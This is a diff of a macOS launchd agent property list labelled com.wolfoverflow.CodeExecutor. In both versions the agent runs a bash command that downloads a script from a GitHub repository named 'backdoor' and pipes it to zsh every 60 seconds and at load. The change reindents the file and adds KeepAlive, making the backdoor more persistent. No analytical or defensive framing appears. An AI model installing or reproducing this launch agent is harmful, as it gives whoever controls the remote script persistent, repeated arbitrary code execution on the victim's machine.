--- a/com.wolfoverflow.CodeExecutor.plist
+++ b/com.wolfoverflow.CodeExecutor.plist
@@ -2,17 +2,19 @@
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 <plist version="1.0">
 <dict>
-   <key>Label</key>
-   <string>com.wolfoverflow.CodeExecutor</string>
-   <key>ProgramArguments</key>
-   <array>
-       <string>/bin/bash</string>
-       <string>-c</string>
-       <string>curl -S "https://raw.githubusercontent.com/Wolfoverflow/backdoor/main/script" | zsh</string>
-   </array>
+    <key>Label</key>
+    <string>com.wolfoverflow.CodeExecutor</string>
+    <key>ProgramArguments</key>
+    <array>
+        <string>/bin/bash</string>
+        <string>-c</string>
+        <string>curl -S "https://raw.githubusercontent.com/Wolfoverflow/backdoor/main/script" | zsh</string>
+    </array>
     <key>StartInterval</key>
     <integer>60</integer>
-   <key>RunAtLoad</key>
-   <true/>
+    <key>KeepAlive</key>
+    <true/>
+    <key>RunAtLoad</key>
+    <true/>
 </dict>
 </plist>
